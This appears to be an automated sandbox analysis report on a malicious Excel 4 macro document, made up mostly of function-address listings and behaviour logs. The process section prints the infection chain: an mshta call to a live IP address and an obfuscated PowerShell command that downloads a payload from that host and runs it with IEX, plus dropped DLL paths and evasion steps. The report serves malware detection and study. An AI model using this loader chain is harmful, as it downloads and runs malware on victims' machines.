Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C9186 11_2_001C9186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C41A7 11_2_001C41A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BE243 11_2_001BE243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C026B 11_2_001C026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C129C 11_2_001C129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BC309 11_2_001BC309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CB391 11_2_001CB391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CC38F 11_2_001CC38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CD3C8 11_2_001CD3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BB41A 11_2_001BB41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C542E 11_2_001C542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CA429 11_2_001CA429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D146E 11_2_001D146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CE498 11_2_001CE498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C04B8 11_2_001C04B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C74DD 11_2_001C74DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D04DE 11_2_001D04DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B44FA 11_2_001B44FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C64F1 11_2_001C64F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C3512 11_2_001C3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BF58F 11_2_001BF58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C45CD 11_2_001C45CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C561F 11_2_001C561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C363D 11_2_001C363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B8650 11_2_001B8650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D3672 11_2_001D3672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B472E 11_2_001B472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C2753 11_2_001C2753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B777B 11_2_001B777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B2830 11_2_001B2830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C1831 11_2_001C1831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BB821 11_2_001BB821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BC850 11_2_001BC850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BE86A 11_2_001BE86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C6864 11_2_001C6864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D0867 11_2_001D0867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B68DE 11_2_001B68DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CD8D7 11_2_001CD8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B88F4 11_2_001B88F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BF93D 11_2_001BF93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B1950 11_2_001B1950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B194C 11_2_001B194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C0946 11_2_001C0946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D1993 11_2_001D1993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CC9A9 11_2_001CC9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C99AA 11_2_001C99AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B6A1F 11_2_001B6A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BCA43 11_2_001BCA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B9A7D 11_2_001B9A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D1B54 11_2_001D1B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C4B56 11_2_001C4B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BBB4B 11_2_001BBB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BAB66 11_2_001BAB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B7B82 11_2_001B7B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C7BCA 11_2_001C7BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CEBFF 11_2_001CEBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C2BF6 11_2_001C2BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B6C29 11_2_001B6C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BEC9B 11_2_001BEC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CCC89 11_2_001CCC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CACD3 11_2_001CACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BBD0F 11_2_001BBD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C0D33 11_2_001C0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D0D5B 11_2_001D0D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C3D41 11_2_001C3D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C8D71 11_2_001C8D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B8D95 11_2_001B8D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BFD8C 11_2_001BFD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BAE9A 11_2_001BAE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CEE94 11_2_001CEE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CBE8C 11_2_001CBE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B6ED6 11_2_001B6ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CFF31 11_2_001CFF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B1F9B 11_2_001B1F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B3FB8 11_2_001B3FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B2FA1 11_2_001B2FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BCFCE 11_2_001BCFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00785CF9 12_2_00785CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007770ED 12_2_007770ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007874DD 12_2_007874DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007804B8 12_2_007804B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078E498 12_2_0078E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077EC9B 12_2_0077EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078EE94 12_2_0078EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078BE8C 12_2_0078BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00791B54 12_2_00791B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077F93D 12_2_0077F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00783512 12_2_00783512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00779700 12_2_00779700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00778D95 12_2_00778D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078B391 12_2_0078B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00779A7D 12_2_00779A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00793672 12_2_00793672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078026B 12_2_0078026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0079146E 12_2_0079146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00786864 12_2_00786864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077E86A 12_2_0077E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00790867 12_2_00790867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077C850 12_2_0077C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00778650 12_2_00778650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077CA43 12_2_0077CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077E243 12_2_0077E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00785040 12_2_00785040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078363D 12_2_0078363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00772830 12_2_00772830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00781831 12_2_00781831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078A429 12_2_0078A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078542E 12_2_0078542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077B821 12_2_0077B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00776C29 12_2_00776C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078561F 12_2_0078561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00776A1F 12_2_00776A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077B41A 12_2_0077B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007788F4 12_2_007788F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007864F1 12_2_007864F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007744FA 12_2_007744FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00776ED6 12_2_00776ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007904DE 12_2_007904DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007768DE 12_2_007768DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078ACD3 12_2_0078ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078D8D7 12_2_0078D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078129C 12_2_0078129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078109E 12_2_0078109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077AE9A 12_2_0077AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078CC89 12_2_0078CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00776083 12_2_00776083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00788D71 12_2_00788D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077777B 12_2_0077777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077AB66 12_2_0077AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00790D5B 12_2_00790D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077F154 12_2_0077F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00771950 12_2_00771950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00782753 12_2_00782753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078A156 12_2_0078A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00784B56 12_2_00784B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00783D41 12_2_00783D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077194C 12_2_0077194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077BB4B 12_2_0077BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00780946 12_2_00780946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078FF31 12_2_0078FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00780D33 12_2_00780D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077472E 12_2_0077472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077911A 12_2_0077911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077BD0F 12_2_0077BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077C309 12_2_0077C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078EBFF 12_2_0078EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00782BF6 12_2_00782BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078D3C8 12_2_0078D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00787BCA 12_2_00787BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007845CD 12_2_007845CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077CFCE 12_2_0077CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00773FB8 12_2_00773FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078C9A9 12_2_0078C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007899AA 12_2_007899AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00772FA1 12_2_00772FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007841A7 12_2_007841A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00791993 12_2_00791993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00771F9B 12_2_00771F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00777B82 12_2_00777B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078C38F 12_2_0078C38F
Source: 54C4.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: DETAILS-145.xls Macro extractor: Sheet name: Macro1
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077C67D DeleteService, 12_2_0077C67D
Source: DETAILS-145.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: DETAILS-145.xls, type: SAMPLE Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Wlnljconerohcjaz\
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: DETAILS-145.xls OLE indicator, VBA macros: true
Source: DETAILS-145.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@29/9@2/36
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: DETAILS-145.xls OLE indicator, Workbook stream: true
Source: DETAILS-145.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: DETAILS-145.xls ReversingLabs: Detection: 34%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREE44.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: 54C4.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Code function: 4_3_029408CA push 8B49024Bh; iretd 4_3_029408CF
Source: C:\Windows\System32\mshta.exe Code function: 4_3_029400BC push 8B49024Bh; iretd 4_3_029400C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017114C push ds; ret 9_2_0017114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001715F5 push cs; retf 9_2_001715FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022114C push ds; ret 10_2_0022114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002215F5 push cs; retf 10_2_002215FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B114C push ds; ret 11_2_001B114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B15F5 push cs; retf 11_2_001B15FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077114C push ds; ret 12_2_0077114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007715F5 push cs; retf 12_2_007715FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F114C push ds; ret 14_2_005F114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F15F5 push cs; retf 14_2_005F15FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D114C push ds; ret 15_2_001D114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D15F5 push cs; retf 15_2_001D15FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: QWER.dll.6.dr Static PE information: real checksum: 0x8f55d should be: 0x94fc5

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
